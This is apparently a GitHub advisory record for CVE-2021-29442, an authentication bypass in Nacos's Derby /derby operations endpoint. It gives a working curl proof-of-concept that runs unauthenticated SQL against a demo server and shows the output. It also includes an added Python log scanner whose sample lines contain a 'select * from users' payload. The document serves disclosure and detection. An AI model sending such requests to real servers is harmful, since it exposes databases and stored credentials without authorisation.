CVE-2021-29442 – com.alibaba.nacos:nacos-common
Package
Manager: maven
Name: com.alibaba.nacos:nacos-common
Vulnerable Version: >=0 <1.4.1
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:H/RL:U/RC:R
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS: 0.94002 (percentile 0.99884)
Details
Authentication bypass for specific endpoint

The [`ConfigOpsController`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java) lets the user perform management operations like querying the database or even wiping it out. While the [`/data/remove`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L133-L135) endpoint is properly protected with the `@Secured` annotation, the [`/derby`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L99-L100) endpoint is not protected and can be openly accessed by unauthenticated users. For example, the following request will list the tables of the database:

```
❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st'
{"code":200,"message":null,"data":[{"TABLENAME":"APP_CONFIGDATA_RELATION_PUBS"},{"TABLENAME":"APP_CONFIGDATA_RELATION_SUBS"},{"TABLENAME":"APP_LIST"},{"TABLENAME":"CONFIG_INFO"},{"TABLENAME":"CONFIG_INFO_AGGR"},{"TABLENAME":"CONFIG_INFO_BETA"},{"TABLENAME":"CONFIG_INFO_TAG"},{"TABLENAME":"CONFIG_TAGS_RELATION"},{"TABLENAME":"GROUP_CAPACITY"},{"TABLENAME":"HIS_CONFIG_INFO"},{"TABLENAME":"PERMISSIONS"},{"TABLENAME":"ROLES"},{"TABLENAME":"SYSALIASES"},{"TABLENAME":"SYSCHECKS"},{"TABLENAME":"SYSCOLPERMS"},{"TABLENAME":"SYSCOLUMNS"},{"TABLENAME":"SYSCONGLOMERATES"},{"TABLENAME":"SYSCONSTRAINTS"},{"TABLENAME":"SYSDEPENDS"},{"TABLENAME":"SYSDUMMY1"},{"TABLENAME":"SYSFILES"},{"TABLENAME":"SYSFOREIGNKEYS"},{"TABLENAME":"SYSKEYS"},{"TABLENAME":"SYSPERMS"},{"TABLENAME":"SYSROLES"},{"TABLENAME":"SYSROUTINEPERMS"},{"TABLENAME":"SYSSCHEMAS"},{"TABLENAME":"SYSSEQUENCES"},{"TABLENAME":"SYSSTATEMENTS"},{"TABLENAME":"SYSSTATISTICS"},{"TABLENAME":"SYSTABLEPERMS"},{"TABLENAME":"SYSTABLES"},{"TABLENAME":"SYSTRIGGERS"},{"TABLENAME":"SYSUSERS"},{"TABLENAME":"SYSVIEWS"},{"TABLENAME":"TENANT_CAPACITY"},{"TABLENAME":"TENANT_INFO"},{"TABLENAME":"USERS"}]}
```

These endpoints are only valid when using embedded storage (Derby DB), so this issue should not affect installations using external storage (e.g. MySQL).
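As an added defender-side example (not part of this advisory or of the Nacos project), the following Python scans web-server access logs for requests to the two config-ops endpoints named above, decodes the `sql` parameter sent to `/derby`, and raises the severity when the query touches the Derby tables that hold Nacos users, roles and permissions. The sample log lines, client addresses and the `/nacos` context path are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Config-ops endpoints named in the advisory, under the default "/nacos" context
# (assumed). /derby accepted arbitrary SQL without authentication before 1.4.1;
# /data/remove is the @Secured sibling, shown so its rejections are visible too.
WATCHED_PATHS = {
    "/nacos/v1/cs/ops/derby": "CVE-2021-29442: unauthenticated Derby query endpoint",
    "/nacos/v1/cs/ops/data/remove": "config-ops data removal (must be authenticated)",
}

# Combined log format: client - - [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def analyze_line(line):
    """Return a finding dict for a request to a watched endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path not in WATCHED_PATHS:
        return None
    # parse_qs turns '+' into spaces and decodes %XX escapes, giving the SQL as sent
    sql = parse_qs(parts.query).get("sql", [""])[0]
    # Tables in the embedded schema that hold credentials and authorization data
    touches_auth = bool(re.search(r"\b(USERS|PERMISSIONS|ROLES)\b", sql, re.I))
    return {
        "client": m.group("client"),
        "time": m.group("time"),
        "path": parts.path,
        "status": int(m.group("status")),
        "sql": sql,
        "reason": WATCHED_PATHS[parts.path],
        "severity": "critical" if touches_auth or parts.path.endswith("/data/remove") else "high",
    }

def scan(lines):
    """Run analyze_line over every log line and keep only the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f]

# Constructed sample lines (not real traffic); the third is a 403 from the protected endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Apr/2021:20:09:25 +0000] "GET /nacos/v1/cs/configs?dataId=app&group=DEFAULT_GROUP HTTP/1.1" 200 318
203.0.113.5 - - [27/Apr/2021:20:09:31 +0000] "GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1" 200 1482
203.0.113.5 - - [27/Apr/2021:20:09:40 +0000] "GET /nacos/v1/cs/ops/derby?sql=select+*+from+users HTTP/1.1" 200 256
198.51.100.9 - - [27/Apr/2021:20:10:02 +0000] "POST /nacos/v1/cs/ops/data/remove HTTP/1.1" 403 0
""".splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['client']} {f['path']} status={f['status']} sql={f['sql']!r}")
```

A 200 on `/derby` from a client that never authenticated is the signal to act on; on a patched or externally-backed (MySQL) deployment the endpoint should not return data at all.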
Metadata
Created: 2021-04-27T20:09:25Z
Modified: 2021-05-10T15:11:26Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-xv5h-v7jh-p2qh/GHSA-xv5h-v7jh-p2qh.json
CWE IDs: ["CWE-306"]
Alternative ID: GHSA-xv5h-v7jh-p2qh
Finding: F006
Auto approve: 1